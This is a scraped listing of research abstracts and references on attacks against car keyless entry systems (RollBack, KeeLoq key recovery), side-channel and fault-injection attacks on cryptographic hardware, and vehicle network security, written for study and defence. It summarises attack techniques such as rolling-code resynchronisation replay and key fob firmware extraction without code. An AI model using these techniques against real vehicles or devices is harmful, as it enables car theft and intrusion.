Automotive Keyless Entry (RKE) systems provide car owners with a degree of convenience, allowing them to lock and unlock the car without using a mechanical key. Today’s RKE systems implement disposable rolling codes, making every key fob button press unique, effectively preventing simple replay attacks. However, a prior attack called RollJam was proven to break all rolling code-based systems in general. By a careful sequence of signal jamming, capturing, and replaying, an attacker can become aware of the subsequent valid unlock signal that has not been used yet. RollJam, however, requires continuous deployment indefinitely until it is exploited. Otherwise, the captured signals become invalid if the key fob is used again without RollJam in place. We introduce RollBack, a new replay-and-resynchronize attack against most of today’s RKE systems. In particular, we show that even though the one-time code becomes invalid in rolling code systems, replaying a few previously captured signals consecutively can trigger a rollback-like mechanism in the RKE system. Put differently, the rolling codes become resynchronized back to a previous code used in the past from where all subsequent yet already used signals work again. Moreover, the victim can still use the key fob without noticing any difference before and after the attack. Unlike RollJam, RollBack does not necessitate jamming at all. In fact, it requires signal capturing only once and can be exploited at any time in the future as many times as desired. This time-agnostic property is particularly attractive to attackers, especially in car-sharing/renting scenarios where accessing the key fob is straightforward. However, while RollJam defeats virtually any rolling code-based system, vehicles might have additional anti-theft measures against malfunctioning key fobs, hence against RollBack. Our ongoing analysis (with crowd-sourced data) against different vehicle makes and models has revealed that ∼ 50% of the examined vehicles in the Asian region are vulnerable to RollBack, while the impact tends to be smaller in other regions like Europe and North America.
Chapter
Edge, fog, and Dew computing have emerged from cloud computing. The proponent of cloud computing says that this model gives a better experience to users. In order to use Dew computing a user need to install DVM (Dew virtual machine) on his system. Dew virtual machine is an isolated environment to run a Dew server or a local PC. It consists of a Dew server (DS), Dew analytic server (DAS), and artificial intelligence of Dew (AID). The Dew server is a cloud server on the local PC. Dew analytic server collects information about how DS is being used. AID takes data from DS and presents it to the user such that it enhances the user experience. Based on the real-time application, many categories of Dew computing exist, e.g., Web in Dew, Software in Dew, Database in Dew, etc. Dew computing can also be used for IoT systems; we may name “IoT-enabled Dew”. As communication in these systems takes place over a public channel, many security concerns come into the picture when we use IoT in Dew. Thus, it is required to be focused on authorization in data access, secure session establishment, user privacy to have confidence in the system and data secrecy. As data is not of computing control of cloud servers, security and authorized access laws remain a key concern in Dew. To ensure secure and authorized communication, an access control mechanism may help, which could be established between the device and the Dew server. As we include Dew in IoT systems, there is also a need to establish a secure session key between the sensor device and the user. In this chapter, we will discuss the security-related issues in Dew and present a discussion on the security concerns of Dew-assisted IoT Systems and user privacy aspects. We will also provide the status of the current Dew system security and future requirements.KeywordsDew computingCloud computingIoTAuthenticationPrivacySecurity
Chapter
DryGASCON and Ascon are two similar authenticated encryption algorithms submitted to NIST’s recently finalized lightweight cryptography competition. DryGASCON was eliminated after the second round, while Ascon won the competition and became the new lightweight cryptography standard. We analyze these two ciphers using differential-linear distinguishers to better understand their security. By using the parallel computing power of GPUs, we show that better distinguishers can be obtained experimentally in practice which cannot be obtained theoretically by known methods. We offer the best experimentally obtained 5-round differential-linear distinguishers for the permutations of Ascon and DryGASCON. We also provide related-key differential-linear attacks on 5-round Ascon.KeywordsLightweight cryptographyCryptanalysisDifferential-linearNIST
Thesis
Full-text available
Dans cette thèse, nous nous intéressons à la problématique de la sécurité des communications du réseau de capteurs intra véhicule électrique connecté. En effet, Plusieurs travaux et expérimentations ont montré que différentes attaques peuvent être menées sur ce réseau telles que l’activation des freins et la prise de contrôle du véhicule à distance, les attaques d’écoute, les attaques DoS sur les ECU (Electronic Control Unit), etc. Des solutions de sécurisation du réseau intra véhiculaire existent dont la plus connue est EVITA (E-safety vehicle intrusion protected applications), proposée dans le cadre du septième programme de recherche et développement technologique. Cependant, ces solutions de sécurité sont énergivores (elles utilisent les mécanismes de sécurité les plus robustes) et sont mal adaptées dans un contexte de contrainte énergétique (Véhicule Electrique). Pour cette raison, nous avons proposé, pour le réseau intra-véhicule électrique, une solution de sécurité basée sur le contexte. Le contexte s’adapte à l’écosystème du véhicule électrique et est composé de l’état de charge (SOC State Of Charge), la distance à la station de recharge, les conditions de trafic, le type de capteur et la capacité en mémoire et traitement des capteurs. Dans CASIEV (Context Aware Security for the Intra Electric Vehicle), le capteur passe toujours au niveau de sécurité le plus élevé selon le contexte. Ainsi, la sécurité des communications peut être assurée lorsque le niveau de la batterie est critique mais que le trafic est faible/moyen et l’énergie restante permet d’atteindre la station de recharge disponible la plus proche. La simulation a montré que CASIEV permet d’augmenter le temps d’activation de la sécurité par rapport aux solutions existantes (statiques). De plus, nous avons remarqué un gaspillage de ressources (énergie, mémoire et traitement) dans le cas où le niveau de risque d’attaques est faible. Pour cette raison, nous avons apportée des améliorations à CASIEV en tenant compte du niveau de risque et de la confiance en ce risque. RICAV (RIsk based Context-Aware security solution for the intra electric Vehicle network) a permis d’augmenter le temps d’activation du système de sécurité et de diminuer la consommation d’énergie tout en assurant la sécurité du conducteur.
Chapter
Modern automobiles are controlled via networked controls. The majority of networks were built with minimal regard to security. Researchers expect to see a variety of attacks on the system recently, prompting them to share their data. This chapter discusses the weaknesses of the Controller Area Network (CAN) within the in-automobile communication protocol and several possible attacks that may be used against it. In addition, we present recent security detection schemes that have been offered in the current level of research to counteract the threats. The primary purpose of this study is to showcase an integrated technique known as an intrusion detection system (IDS). It has been a significant instrument in protecting information and networks systems for decades. Therefore, we have presented a detailed literature review examining existing IDS. For the investigation of IDS, we considered the following aspects: approaches used for detection, strategies used for deployment, attack mechanisms, and technical issues and challenges. We classify and compare current IDS approaches based on criteria such as real-time limitations, hardware types, CAN Bus behavior changes, attack mitigation types, and software/hardware used to validate these systems. Similarly, other scholars will be encouraged to pursue IDS research on the CAN bus system as a result of the current study.
Article
Recently, Akram et al. (2021) proposed a drones-access protocol for monitoring urban security. Akram et al. claimed that their protocol is secure and can resist known security attacks. However, in this comment article, we demonstrate that their protocol is still vulnerable to drone capture attacks and stolen-verifier attacks. In addition, their protocol does not provide perfect forward secrecy. Finally, we present an improved protocol to manage the security weaknesses we found.
Article
Full-text available
Worldwide growth in electric vehicle use is prompting new installations of private and public electric vehicle supply equipment (EVSE). EVSE devices support the electrification of the transportation industry but also represent a linchpin for power systems and transportation infrastructures. Cybersecurity researchers have recently identified several vulnerabilities that exist in EVSE devices, communications to electric vehicles (EVs), and upstream services, such as EVSE vendor cloud services, third party systems, and grid operators. The potential impact of attacks on these systems stretches from localized, relatively minor effects to long-term national disruptions. Fortunately, there is a strong and expanding collection of information technology (IT) and operational technology (OT) cybersecurity best practices that may be applied to the EVSE environment to secure this equipment. In this paper, we survey publicly disclosed EVSE vulnerabilities, the impact of EV charger cyberattacks, and proposed security protections for EV charging technologies.
Chapter
We investigate the susceptibility of the Texas Instruments SimpleLink platform microcontrollers to non-invasive physical attacks. We extracted the ROM bootloader of these microcontrollers and then analysed it using static analysis augmented with information obtained through emulation. We demonstrate a voltage fault injection attack targeting the ROM bootloader that allows to enable debug access on a previously locked microcontroller within seconds. Information provided by Texas Instruments reveals that one of our voltage fault injection attacks abuses functionality that is left over from the integrated circuit manufacturing process. The demonstrated physical attack allows an adversary to extract the firmware (i.e. intellectual property) and to bypass secure boot. Additionally, we mount side-channel attacks and differential fault analysis attacks on the hardware AES co-processor. To demonstrate the practical applicability of these attacks we extract the firmware from a Tesla Model 3 key fob.This paper describes a case study covering Texas Instruments SimpleLink microcontrollers. Similar attack techniques can be, and have been, applied to microcontrollers from other manufacturers. The goal of our work is to document our analysis methodology and to ensure that system designers are aware of these vulnerabilities. They will then be able to take these into account during the product design phase. All identified vulnerabilities were responsibly disclosed.KeywordsSimpleLinkFirmware recoveryFault injectionSide-channel analysis
Article
Full-text available
Teknolojide yaşanan hızlı gelişmelerle günümüzde kullanımı hızlı artan akıllı ulaşım araçları, artan talep ve sağladıkları kolaylıklar sebebiyle kısa zamanda dünya çapında önemli bir yere sahip olacaktır. Akıllı ve otonom ulaşım araçları alanındaki teknolojik gelişmeler söz konusu olduğunda hızlı bir ivme kazanıldığı göz ardı edilemez. Gelişmiş makine öğrenimi ve yapay zekâ tekniklerinden yararlanan yarı otonom ve otonom arabaların ortaya çıkmasıyla birlikte potansiyel riskler ve siber güvenlik zorlukları artmaktadır. Dahası, akıllı ulaşım sistemlerinin ve otonom araçların konuşlandırılması için gerekli Araçtan Araca (V2V) ve Araçtan Altyapıya (V2I) ara yüzler, potansiyel saldırı yüzeyini ve saldırı vektörlerini büyük ölçüde genişlettikleri için güvenlik risklerini daha da artırmaktadır. Yapay zekâ ve yazılımla çalışan bu araçlar her ne kadar sürücü güvenliği ve konforunu artırsa da dışarıdan gelebilecek siber saldırılardan dolayı büyük ölçekte can ve mal kaybına da sebep olabilmektedir. Bu nedenle, akıllı ulaşım araçları ile ilgili tehditleri ve siber güvenlik risklerini analiz etmek ve bu son derece karmaşık, heterojen ve değişken ortamın özelliklerini dikkate alarak bu riskleri ele almak için güvenlik önlemleri ortaya koymak son derece önemli hale gelmektedir. Bu çalışmada akıllı ulaşım araçlarına yapılan siber güvenlik saldırıları, doğabilecek sonuçlar ve alınabilecek güvenlik önlemleri açıklanmaya ve analiz edilmeye çalışılacaktır. Ayrıca bu sistemlerde kullanılan çok katmanlı savunma sistemi incelenerek değerlendirilmiştir.
Article
Up till now, numerous authentication and key agreement schemes have been proposed for ubiquitous networks. Recently, Arshad and Rasoolzadegan also proposed an authentication and key agreement scheme for ubiquitous network with user anonymity. However, we determined that Arshad and Rasoolzadegan’s scheme has the following flaws: (1) the login phase is inefficient, which may lead to server resource exhaustion attacks; (2) the password change phase is inefficient and not user-friendly; and (3) the revocation phase arisen when the mobile device is lost and the re-register phase is absent. Therefore, we propose an improved scheme that successfully removes all of the previous mentioned flaws existing in Arshad and Rasoolzadegan’s protocol by using the biometric based authentication. Formal analysis of the proposed scheme is conducted using the random oracle model, and heuristic analysis is also conducted to demonstrate that the proposed scheme fulfills all of the security requirements. In addition, the proposed scheme is validated by the Automated Validation of Internet Security Protocols and Applications (AVISPA) tool. Moreover, computational and communication cost comparisons indicate that our improved scheme is more suitable for ubiquitous networks.
Chapter
In the past decade, the Internet of Things (IoT) has emerged as a wonder-pill to our problems. This chapter gives an overview of physical security threats and protection mechanisms of low-end IoT devices, focusing on side-channel analysis (SCA) and fault analysis attacks. It concentrates on remote attestation (RA) techniques, that aim at detecting malicious changes in the device’s firmware by requesting a proof to verify the sanity of the device. RA is a security protocol that runs between a trusted party called Verifier and “potentially” untrusted party called Prover. Primarily, RA techniques can be subdivided into three main categories: software-based RA; hardware-based RA, and hybrid architecture-based RA. The chapter discusses challenges that IoT malware poses on IoT systems and introduces state-of-the-art intrusion detection approaches for IoT networks for coping with such threats.
Chapter
Efficient implementation of Boolean masking in terms of low latency has evolved into a hot topic due to the necessity of embedding a physically secure and at-the-same-time fast implementation of cryptographic primitives in e.g., the memory encryption of pervasive devices. Instead of fully minimizing the circuit’s area and randomness requirements at the cost of latency, the focus has changed into finding optimal tradeoffs between the circuit area and the execution time. The main latency bottleneck in hardware masking lies in the need for registers to stop the propagation of glitches and maintain non-completeness. Usually, an exponentially growing number of shares (hence an extremely large circuit), as well as a high demand for fresh randomness, are the result of avoiding registers in a securely masked hardware implementation of a block cipher. In this paper, we present several first-order secure and low-latency implementations of PRINCE. In particular, we show how to realize the masked variant of round-based PRINCE with only a single register stage per cipher round. We compare the resulting architectures, based on the popular TI and GLM masking scheme based on the area, latency, and randomness requirements and point out that both designs are suited for specific use cases.
Chapter
We complete the state-of-the-art on the side-channel security of real-world devices by analysing two 32-bit microcontrollers equipped with an unprotected co-processor. Our results show that (i) the lack of understanding of their hardware architecture can be circumvented with standard detection tools – for this purpose, we combine a simple variation of the Test Vector Leakage Assessment methodology with Signal-to-Noise Ratio estimations, which enables the efficient identification of attack vectors; (ii) standard distinguishers then lead to powerful key recoveries with less than 5,000 traces; and (iii) preprocessing like the continuous wavelet transform can be useful in such a black box evaluation context.
Article
Nowadays, lightweight cryptography attracts academicians, scientists and researchers to concentrate on its requisite with the increasing usage of low resource devices. In this paper, a new lightweight image encryption scheme is proposed using the Lorenz 3D super chaotic map. This encryption scheme is an addition–rotation–XOR block cipher designed for its supremacy, efficacy and speed execution. In this addition–rotation–XOR cipher, the equation for Lorenz 3D chaotic map is iteratively solved to generate double valued signals in a speedy manner using the Runge–Kutta and Euler methods. The addition, rotation and diffusion sequences are generated from the double valued signals, and the source pixels of the 8-bit plain test images are manipulated with the addition, rotation and diffusion of the bytes. Finally, the cipher images are constructed from the manipulated pixels and evaluated with various statistical as well as randomness tests. The results from various tests prove that the proposed chaotic addition–rotation–XOR block image cipher is efficient in terms of randomness and speed.
Article
Full-text available
Fog computing (FC) is an infrastructure consisting of decentralized computing, where computing resources suchas storage, applications, and data are scattered among the cloud and data source. Fog computing inherits similarprivacy and security concerns present in cloud computing, such as authentication and key management issues.Recently, Wazid et al. presented a scheme of authentication key exchange for fog computing called SAKA-FC to address these issues. We analyzed and identified that the SAKA-FC suffers from some severe vulnerabilities.Furthermore, we presented an improved scheme to mitigate these problems while retaining its strengths. The formal security analysis of the proposed scheme is validated through BAN logic. At the same time, the AVISPAtool is employed for automated formal security verification. Informal security analysis is conducted to attestthat the proposal can confront the known attacks. Using computation and communication costs as the metrics,the proposed scheme is also compared with some state-of-the-art schemes. The proposed scheme achieves thesame communication cost as of SAKA-FC, whereas the difference in computation cost is 24%. This increase in computation cost is justifiable as the proposal is resistant to clogging attacks and provides better security than the prior schemes.
Preprint
The continuing use of proprietary cryptography in embedded systems across many industry verticals, from physical access control systems and telecommunications to machine-to-machine authentication, presents a significant obstacle to black-box security-evaluation efforts. In-depth security analysis requires locating and classifying the algorithm in often very large binary images, thus rendering manual inspection, even when aided by heuristics, time consuming. In this paper, we present a novel approach to automate the identification and classification of (proprietary) cryptographic primitives within binary code. Our approach is based on Data Flow Graph (DFG) isomorphism, previously proposed by Lestringant et al. Unfortunately, their DFG isomorphism approach is limited to known primitives only, and relies on heuristics for selecting code fragments for analysis. By combining the said approach with symbolic execution, we overcome all limitations of their work, and are able to extend the analysis into the domain of unknown, proprietary cryptographic primitives. To demonstrate that our proposal is practical, we develop various signatures, each targeted at a distinct class of cryptographic primitives, and present experimental evaluations for each of them on a set of binaries, both publicly available (and thus providing reproducible results), and proprietary ones. Lastly, we provide a free and open-source implementation of our approach, called Where's Crypto?, in the form of a plug-in for the popular IDA disassembler.
Article
Full-text available
Due to the limitations of symmetric-key techniques, authentication and key agreement (AKA) protocols based on public-key techniques have attracted much attention, providing secure access and communication mechanism for various application environments. Among these public-key techniques used for AKA protocols, chaotic-map is more effective than scalar multiplication and modular exponentiation, and it offers a list of desirable cryptographic properties such as un-predictability, un-repeatability, uncertainty and higher efficiency than scalar multiplication and modular exponentiation. Furthermore, it is usually believed that three-factor AKA protocols can achieve higher security level than single-and two-factor protocols. However, none of existing three-factor AKA protocols can meet all security requirements. One of the most prevalent problems is how to balance security and usability, and particularly how to achieve truly three-factor security while providing password change friendliness. To deal with this problem, in this paper we put forward a provably secure three-factor AKA protocol based on extended chaotic-maps for mobile lightweight devices, by adopting the techniques of "Fuzzy-Verifiers" and "Honeywords". We prove the security of the proposed protocol in the random oracle model, assuming the intractability of extended chaotic-maps Computational Diffie-Hellman problem. We also simulate the protocol by using the AVISPA tool. The security analysis and simulation results show that our protocol can meet all 13 evaluation criteria regarding security. We also assess the performance of our protocol by comparing with seven other related protocols. The evaluation results demonstrate that our protocol offers better balance between security and usability over state-of-the-art ones.
Conference Paper
Full-text available
Recently a new class of collision attacks which was originally suggested by Hans Dobbertin has been introduced. These attacks use side channel analysis to detect internal collisions and are generally not restricted to a particular cryptographic algorithm. As an example, a collision attack against DES was proposed which combines internal collisions with side channel information leakage. It had not been obvious, however, how this attack applies to non-Feistel ciphers with bijective S-boxes such as the Advanced Encryption Standard (AES). This contribution takes the same basic ideas and develops new optimized attacks against AES. Our major finding is that the new combined analytical and side channel approach reduces the attack effort compared to all other known side channel attacks. We develop several versions and refinements of the attack. First we show that key dependent collisions can be caused in the output bytes of the mix column transformation in the first round. By taking advantage of the birthday paradox, it is possible to cause a collision in an output with as little as 20 measurements. If a SPA leak is present from which collisions can be determined with certainty, then each collision will reveal at least 8 bits of the secret key. Furthermore, in an optimized attack, it is possible to cause collisions in all four output bytes of the mix column transformation with an average of only 31 measurements, which results in knowledge of all 32 key bits. Finally, if collisions are caused in all four columns of the AES in parallel, it is possible to determine the entire 128-bit key with only 40 measurements, which a is a distinct improvement compared to DPA and other side channel attacks. Keywords: AES, side channel attacks, internal collisions, birthday paradox.
Conference Paper
Full-text available
During the last years, several masking schemes for AES have been proposed to secure hardware implementations against DPA attacks. In order to investigate the effectiveness of these countermeasures in practice, we have designed and manufactured an ASIC. The chip features an unmasked and two masked AES-128 encryption engines that can be attacked independently. In addition to conventional DPA attacks on the output of registers, we have also mounted attacks on the output of logic gates. Based on simulations and physical measurements we show that the unmasked and masked implementations leak side-channel information due to glitches at the output of logic gates. It turns out that masking the AES S-Boxes does not prevent DPA attacks, if glitches occur in the circuit.
Conference Paper
Full-text available
Recently a new class of collision attacks which was origi- nally suggested by Hans Dobbertin has been introduced. These attacks use side channel analysis to detect internal collisions and are generally not restricted to a particular cryptographic algorithm. As an example, a collision attack against DES was proposed which combines internal col- lisions with side channel information leakage. It had not been obvious, however, how this attack applies to non-Feistel ciphers with bijective S-boxes such as the Advanced Encryption Standard (AES). This contri- bution takes the same basic ideas and develops new optimized attacks against AES. Our major nding is that the new combined analytical and side channel approach reduces the attack eort compared to all other known side channel attacks. We develop several versions and renemen ts of the attack. First we show that key dependent collisions can be caused in the output bytes of the mix column transformation in the rst round. By taking advantage of the birthday paradox, it is possible to cause a collision in an output with as little as 20 measurements. If a SPA leak is present from which collisions can be determined with certainty, then each collision will reveal at least 8 bits of the secret key. Furthermore, in an optimized attack, it is possible to cause collisions in all four output bytes of the mix column transformation with an average of only 31 measure- ments, which results in knowledge of all 32 key bits. Finally, if collisions are caused in all four columns of the AES in parallel, it is possible to determine the entire 128-bit key with only 40 measurements, which a is a distinct improvement compared to DPA and other side channel attacks.
Conference Paper
Full-text available
A classical model is used for the power consumption of cryptographic devices. It is based on the Hamming distance of the data handled with regard to an unknown but constant reference state. Once validated experimentally it allows an optimal attack to be derived called Correlation Power Analysis. It also explains the defects of former approaches such as Differential Power Analysis. Keywords: Correlation factor, CPA, DPA, Hamming distance, power analysis, DES, AES, secure cryptographic device, side channel.
Conference Paper
Full-text available
Field Programmable Gate Arrays (FPGAs) are becoming increasingly popular, especially for rapid prototyping. For implementa- tions of cryptographic algorithms, not only the speed and the size of the circuit are important, but also their security against implementation attacks such as side-channel attacks. Power-analysis attacks are typical examples of side-channel attacks, that have been demonstrated to be efiective against implementations without special countermeasures. The ∞exibility of FPGAs is an important advantage in real applications but also in lab environments. It is therefore natural to use FPGAs to assess the vulnerability of hardware implementations to power-analysis attacks. To our knowledge, this paper is the flrst to describe a setup to con- duct power-analysis attacks on FPGAs. We discuss the design of our hand-made FPGA-board and we provide a flrst characterization of the power consumption of a Virtex 800 FPGA. Finally we provide strong evidence that implementations of elliptic curve cryptosystems without speciflc countermeasures are indeed vulnerable to simple power-analysis
Conference Paper
Full-text available
Cryptanalysis of symmetric and asymmetric ciphers is computationally extremely demanding. Since the security parameters (in particular the key length) of almost all practical crypto algorithms are chosen such that attacks with conventional computers are computationally infeasible, the only promising way to tackle existing ciphers (assuming no mathematical breakthrough) is to build special-purpose hardware. Dedicating those machines to the task of cryptanalysis holds the promise of a dramatically improved cost-performance ratio so that breaking of commercial ciphers comes within reach. This contribution presents the design and realization of the COPACOBANA (Cost-Optimized Parallel Code Breaker) machine, which is optimized for running cryptanalytical algorithms and can be realized for less than US$ 10,000. It will be shown that, depending on the actual algorithm, the architecture can outperform conventional computers by several orders in magnitude. COPACOBANA hosts 120 low-cost FPGAs and is able to, e.g., perform an exhaustive key search of the Data Encryption Standard (DES) in less than nine days on average. As a real-world application, our architecture can be used to attack machine readable travel documents (ePass). COPACOBANA is intended, but not necessarily restricted to solving problems related to cryptanalysis. The hardware architecture is suitable for computational problems which are parallelizable and have low communication requirements. The hardware can be used, e.g., to attack elliptic curve cryptosystems and to factor numbers. Even though breaking full-size RSA (1024 bit or more) or elliptic curves (ECC with 160 bit or more) is out of reach with COPACOBANA, it can be used to analyze cryptosystems with a (deliberately chosen) small bitlength to provide reliable security estimates of RSA and ECC by extrapolation.
Article
Full-text available
KeeLoq is a lightweight block cipher with a 32-bit block size and a 64-bit key. Despite its short key size, it is used in remote keyless entry systems and other wireless authentication applications. For example, there are indications that authentication protocols based on KeeLoq are used, or were used by various car manufacturers in anti-theft mechanisms. This paper presents a practical key recovery attack against KeeLoq that requires 216 known plaintexts and has a time complexity of 244.5 KeeLoq encryptions. It is based on the principle of slide attacks and a novel approach to meet-in-the-middle attacks. We investigated the way KeeLoq is intended to be used in practice and conclude that our attack can be used to subvert the security of real systems. In some scenarios the adversary may even reveal the master secret used in an entire class of devices from attacking a single device. Our attack has been fully implemented. We have built a device that can obtain the data required for the attack in less than 100 minutes, and our software experiments show that, given the data, the key can be found in 7.8 days of calculations on 64 CPU cores.
Conference Paper
Full-text available
KeeLoq is a block cipher used in wireless devices that unlock the doors and alarms in cars manufactured by Chrysler, Daewoo, Fiat, GM, Honda, Jaguar, Toyota, Volvo, Volkswagen, etc [8,9,33,34]. KeeLoq is inexpensive to implement and economical in gate count, yet according to Microchip [33] it should have “a level of security comparable to DES”. In this paper we present several distinct attacks on KeeLoq, each of them is interesting for different reasons. First we show that when about 232 known plaintexts are available, KeeLoq is very weak and for example for 30% of all keys the full key can be recovered with complexity of 228 KeeLoq encryptions. Then we turn our attention to algebraic attacks with the major challenge of breaking KeeLoq given potentially a very small number of known plaintexts. Our best “direct” algebraic attack can break up to 160 rounds of KeeLoq. Much better results are achieved in combination with slide attacks. Given about 216 known plaintexts, we present a slide-algebraic attack that uses a SAT solver with the complexity equivalent to about 253 KeeLoq encryptions. To the best of our knowledge, this is the first time that a full-round real-life block cipher is broken using an algebraic attack.
Conference Paper
We present template attacks, the strongest form of side channel attack possible in an information theoretic sense. These attacks can break implementations and countermeasures whose security is dependent on the assumption that an adversary cannot obtain more than one or a limited number of side channel samples. They require that an adversary has access to an identical experimental device that he can program to his choosing. The success of these attacks in such constraining situations is due manner in which noise within each sample is handled. In contrast to previous approaches which viewed noise as a hindrance that had to be reduced or eliminated, our approach focuses on precisely modeling noise, and using this to fully extract information present in a single sample. We describe in detail how an implementation of RC4, not amenable to techniques such as SPA and DPA, can easily be broken using template attacks with a single sample. Other applications include attacks on certain DES implementations which use DPA-resistant hardware and certain SSL accelerators which can be attacked by monitoring electromagnetic emanations from an RSA operation even from distances of fifteen feet.
Article
Since their publication in 1998 and 2001 respectively, Power and Electromagnetic Analysis (SPA, DPA, EMA) have been successfully used to retrieve secret informa- tion stored in cryptographic devices. Both attacks usually model the side-channel leakages using the so-called \Hamming weight" and \Hamming distance" models, i.e. they only consider the number of bit transitions in a device as an image of its leakage. In these models, the main difierence between power and electromagnetic analysis is assumed to be the fact that the latter allows space localization (i.e. to observe the leakage of only a part of the cryptographic device). In this paper, we make use of a more accurate leakage model for CMOS devices and investigate its consequences. In particular, we show that it is practically feasible to distinguish between 0 ! 1 and 1 ! 0 bit transitions in certain implementations and that elec- tromagnetic analysis is particularly e-cient in this respect. We denote this model as the \switching distance" leakage model and show how it may be very helpful to defeat some commonly used countermeasures (e.g. data buses precharged with random values). Then, we compare the difierent models and stress their respective constraints/advantages regarding practical attacks.
Article
. Cryptosystem designers frequently assume that secrets will be manipulated in closed, reliable computing environments. Unfortunately, actual computers and microchips leak information about the operations they process. This paper examines specific methods for analyzing power consumption measurements to find secret keys from tamper resistant devices. We also discuss approaches for building cryptosystems that can operate securely in existing hardware that leaks information. Keywords: differential power analysis, DPA, SPA, cryptanalysis, DES 1 Background Attacks that involvemultiple parts of a security system are difficult to predict and model. If cipher designers, software developers, and hardware engineers do not understand or review each other's work, security assumptions made at each level of a system's design may be incomplete or unrealistic. As a result, security faults often involveunanticipated interactions between components designed by different people. Manytechniques ...
http://rfidsec07.etsit.uma.es/slides/papers/paper-22.pdf 2 Correlation Power Analysis with a Leakage Model
  • A Bogdanov
  • E Brier
  • C Clavier
  • F Olivier
Bogdanov, A.: Attacks on the KeeLoq Block Cipher and Authentication Systems. In: 3rd Conference on RFID Security 2007 (RFIDSec 2007), http://rfidsec07.etsit.uma.es/slides/papers/paper-22.pdf 2. Brier, E., Clavier, C., Olivier, F.: Correlation Power Analysis with a Leakage Model. In: Joye, M., Quisquater, J.-J. (eds.) CHES 2004. LNCS, vol. 3156, pp. 16–29. Springer, Heidelberg (2004)
Details of Near Field Probe Set RF 2
  • Emv-Technik Langer
Langer EMV-Technik. Details of Near Field Probe Set RF 2, http://www.langer-emv.de/en/produkte/prod rf2.htm
An Introduction to KeeLoq Code Hopping
  • Microchip
Microchip. An Introduction to KeeLoq Code Hopping, http://ww1.microchip.com/downloads/en/AppNotes/91002a.pdf
HCS410, KeeLoq Code Hopping Encoder and Transponder
  • Microchip
KeeLoq Code Hopping Encoder and Transponder
  • Microchip
Attacks on the KeeLoq Block Cipher and Authentication Systems
  • A Bogdanov
Bogdanov, A.: Attacks on the KeeLoq Block Cipher and Authentication Systems. In: 3rd Conference on RFID Security 2007 (RFIDSec 2007), http://rfidsec07.etsit.uma.es/slides/papers/paper-22.pdf
Correlation Power Analysis with a Leakage Model
  • E Brier
  • C Clavier
  • F Olivier
Brier, E., Clavier, C., Olivier, F.: Correlation Power Analysis with a Leakage Model. In: Joye, M., Quisquater, J.-J. (eds.) CHES 2004. LNCS, vol. 3156, pp. 16-29. Springer, Heidelberg (2004)
Algebraic and Slide Attacks on KeeLoq
  • N T Courtois
  • G V Bard
  • D Wagner
Courtois, N.T., Bard, G.V., Wagner, D.: Algebraic and Slide Attacks on KeeLoq. In: FSE 2008. LNCS. Springer, Heidelberg (2008)
Breaking Ciphers with COPACOBANA -A Cost-Optimized Parallel Code Breaker
  • S Kumar
  • C Paar
  • J Pelzl
  • G Pfeiffer
  • M Schimmler
Kumar, S., Paar, C., Pelzl, J., Pfeiffer, G., Schimmler, M.: Breaking Ciphers with COPACOBANA -A Cost-Optimized Parallel Code Breaker. In: Goubin, L., Matsui, M. (eds.) CHES 2006. LNCS, vol. 4249, pp. 101-118. Springer, Heidelberg (2006)
Successfully Attacking Masked AES Hardware Implementations
  • S Mangard
  • N Pramstaller
  • E Oswald
Mangard, S., Pramstaller, N., Oswald, E.: Successfully Attacking Masked AES Hardware Implementations. In: Rao, J.R., Sunar, B. (eds.) CHES 2005. LNCS, vol. 3659, pp. 157-171. Springer, Heidelberg (2005)
Power-Analysis Attacks on an FPGA -First Experimental Results
  • S B Örs
  • E Oswald
  • B Preneel
Örs, S.B., Oswald, E., Preneel, B.: Power-Analysis Attacks on an FPGA -First Experimental Results. In: Walter, C.D., Koç, Ç.K., Paar, C. (eds.) CHES 2003. LNCS, vol. 2779, pp. 35-50. Springer, Heidelberg (2003)
  • K Schramm
  • G Leander
  • P Felke
  • C Paar
Schramm, K., Leander, G., Felke, P., Paar, C.: A Collision-Attack on AES: Combining Side Channel-and Differential-Attack. In: Joye, M., Quisquater, J.-J. (eds.) CHES 2004. LNCS, vol. 3156, pp. 163-175. Springer, Heidelberg (2004)
A Practical Attack on KeeLoq
  • S Indesteege
  • N Keller
  • O Dunkelman
  • E Biham
  • B Preneel
  • S. Indesteege